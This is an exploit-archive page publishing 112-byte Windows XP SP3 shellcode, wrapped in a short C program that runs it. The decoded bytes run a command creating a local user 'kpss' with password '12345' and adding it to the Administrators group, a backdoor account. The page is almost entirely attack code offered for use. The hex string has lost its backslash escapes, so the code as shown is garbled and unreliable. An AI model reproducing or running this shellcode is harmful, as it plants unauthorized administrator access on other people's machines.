win32/PerfectXp-pc1/sp3 (Tr) Add Admin Shellcode 112 bytes

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : win32/PerfectXp-pc1/sp3 (Tr) Add Admin Shellcode 112 bytes
# Published : 2011-07-18
# Author :
# Previous Title : Linux x86 egghunt shellcode
# Next Title : linux/x86-64 execve(/bin/sh) 52 bytes

# Title      : win32/PerfectXp-pc1/sp3 (Tr) Add Admin Shellcode 112 bytes
# Author     : KaHPeSeSe
# Screenshot : http://i53.tinypic.com/289yamq.jpg  
# Desc.      : usr: kpss , pass: 12345 , localgroup: Administrator
# Tested on  : PERFECT XP PC1 / SP3
# Date       : 18/07/2011
# Not        : a.q kpss :((
 
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
  
int main(){
     
    unsigned char shellcode[]=
    "xebx1bx5bx31xc0x50x31xc0x88x43x4ex53xbbx0dx25x86x7c"
    "xffxd3x31xc0x50xbbx12xcbx81x7cxffxd3xe8xe0xffxffxff"
    "x63x6dx64x2ex65x78x65x20x2fx63x20x6ex65x74x20x75x73"
    "x65x72x20x6bx70x73x73x20x31x32x33x34x35x20x2fx61x64"
    "x64x20x26x26x20x6ex65x74x20x6cx6fx63x61x6cx67x72x6f"
    "x75x70x20x41x64x6dx69x6ex69x73x74x72x61x74x6fx72x73"
    "x20x2fx61x64x64x20x6bx70x73x73";
  
    printf("Size = %d bytesn", strlen(shellcode));
  
    ((void (*)())shellcode)();
     
     
  
    return 0;
}